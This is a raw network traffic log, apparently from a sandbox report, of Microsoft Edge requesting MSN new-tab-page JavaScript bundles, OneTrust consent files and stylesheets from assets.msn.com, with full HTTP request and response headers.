content-md5: Y7AqroYwxNtzVhk4Xli0Gw==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF71A6F4A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe7b007-a01e-00f6-7b5b-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:46 GMT
akamai-request-bc: [a=88.221.24.111,b=431525140,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b88d14
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.a2002d1d0671497c684f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/microsoft.a2002d1d0671497c684f.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: RmORve+KL8YOn3CldXkPsw==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF56759B3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 34666f75-b01e-006b-455d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:46 GMT
akamai-request-bc: [a=88.221.24.111,b=431525322,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b88dca
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.jsonmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.json HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: r7mh/7URLmEu+g0rwicZlg==
last-modified: Wed, 28 Dec 2022 06:42:35 GMT
etag: 0x8DAE89EB4875EC6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9f225e82-d01e-0073-1e4a-1b9f80000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:46 GMT
content-length: 1503
akamai-request-bc: [a=88.221.24.111,b=431525415,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=17, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b88e27
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/common.e4f56449506648e57a1d.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: uU+TMKm9q8LqCL2ScstmgA==
last-modified: Fri, 16 Dec 2022 21:57:04 GMT
etag: 0x8DADFB077FBDDA3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1271393f-501e-00a5-4d99-114cf4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:46 GMT
akamai-request-bc: [a=88.221.24.111,b=431525614,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=17, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b88eee
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experience.eaf138ecbe33568d515f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experience.eaf138ecbe33568d515f.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: YxCFPRJro4UjBej0F2E+5A==
last-modified: Tue, 20 Dec 2022 23:56:06 GMT
etag: 0x8DAE2E5C264D322
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2de559e1-301e-00e7-52ce-14c9e1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:46 GMT
akamai-request-bc: [a=88.221.24.111,b=431525680,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b88f30
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/3f919e77-021f-4b8a-a023-eb702b275e96/nl-nl.jsonmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/3f919e77-021f-4b8a-a023-eb702b275e96/nl-nl.json HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6ONjmBOdHHZakgVMvszI8A==
last-modified: Thu, 29 Dec 2022 07:52:17 GMT
etag: 0x8DAE9719B83CB95
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d9eae53e-301e-0004-7fa9-1bba97000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:48 GMT
content-length: 18200
akamai-request-bc: [a=88.221.24.111,b=431528194,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b89902
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.jsonmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: AiX/meRydA2i5/EidiP9EA==
last-modified: Wed, 28 Dec 2022 06:42:37 GMT
etag: 0x8DAE89EB5780BC1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5cb2fe9f-401e-001e-3f3c-1b2ffd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:48 GMT
content-length: 39019
akamai-request-bc: [a=88.221.24.111,b=431528223,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8991f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otFlat.jsonmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otFlat.json HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: AJdDbL1JQ/gyq5yBloy2oA==
last-modified: Wed, 28 Dec 2022 06:42:36 GMT
etag: 0x8DAE89EB4D7986F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e00b2059-401e-0039-53a4-1a4960000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:51 GMT
content-length: 2942
akamai-request-bc: [a=88.221.24.111,b=431532755,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8aad3
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/v2/otPcCenter.jsonmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/v2/otPcCenter.json HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: kovU8FjDzh/SC+UP508c2A==
last-modified: Wed, 28 Dec 2022 06:42:36 GMT
etag: 0x8DAE89EB517A751
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d373a22-a01e-002a-73f5-1a0528000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:51 GMT
content-length: 11812
akamai-request-bc: [a=88.221.24.111,b=431532756,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8aad4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otCookieSettingsButton.jsonmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otCookieSettingsButton.json HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: yzAZBWkftRV1wIDl+iOMtQ==
last-modified: Wed, 28 Dec 2022 06:42:36 GMT
etag: 0x8DAE89EB5113F70
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d348c9d-801e-005c-05f5-1ade32000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:51 GMT
content-length: 2120
akamai-request-bc: [a=88.221.24.111,b=431532757,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8aad5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otCommonStyles.cssmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/assets/otCommonStyles.css HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 5PiOOvIRvZ6iA9I8sLJh1Q==
last-modified: Wed, 28 Dec 2022 06:42:36 GMT
etag: 0x8DAE89EB4AC47B3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f69bd7ff-101e-0072-2efb-1a618d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:51 GMT
content-length: 4135
akamai-request-bc: [a=88.221.24.111,b=431532768,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8aae0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/topicData.2f87b36d845c192a4005.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/topicData.2f87b36d845c192a4005.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Z1/o+DrW5p5MtE7G7OKigg==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF71B598D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a22aa5fb-e01e-000e-4f5a-14af85000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:51 GMT
akamai-request-bc: [a=88.221.24.111,b=431533037,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=38, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8abed
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/feed-navigation-header.49f8d5a22223ee379222.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/feed-navigation-header.49f8d5a22223ee379222.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: pK/F7n3mUDFrw8cgvX8z7g==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF5444677
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aab69b98-601e-00fa-5f5c-14a6d8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:51 GMT
akamai-request-bc: [a=88.221.24.111,b=431533663,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8ae5f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_MsftInfopaneModule_js.676830c5bc3aeeae5acd.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_MsftInfopaneModule_js.676830c5bc3aeeae5acd.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: mypWYjtheNkzZ8GoTGrEUw==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7498EBB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b417aad5-801e-004c-1b50-142a90000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:52 GMT
akamai-request-bc: [a=88.221.24.111,b=431533955,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8af83
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedModule_js.d29bbb665e79fef8f507.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedModule_js.d29bbb665e79fef8f507.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: sF1Xn0Ycz6LVt2kXMj0fbA==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5B6CD9E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a22aa703-e01e-000e-065a-14af85000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:52 GMT
akamai-request-bc: [a=88.221.24.111,b=431534468,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8b184
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/grid-view-feed.94a4e2b7b899f9486726.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/grid-view-feed.94a4e2b7b899f9486726.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: HBqhHU/9+VV+FKvP4U1LKA==
last-modified: Fri, 16 Dec 2022 21:57:10 GMT
etag: 0x8DADFB07B497B6F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 12714391-501e-00a5-5b99-114cf4000000
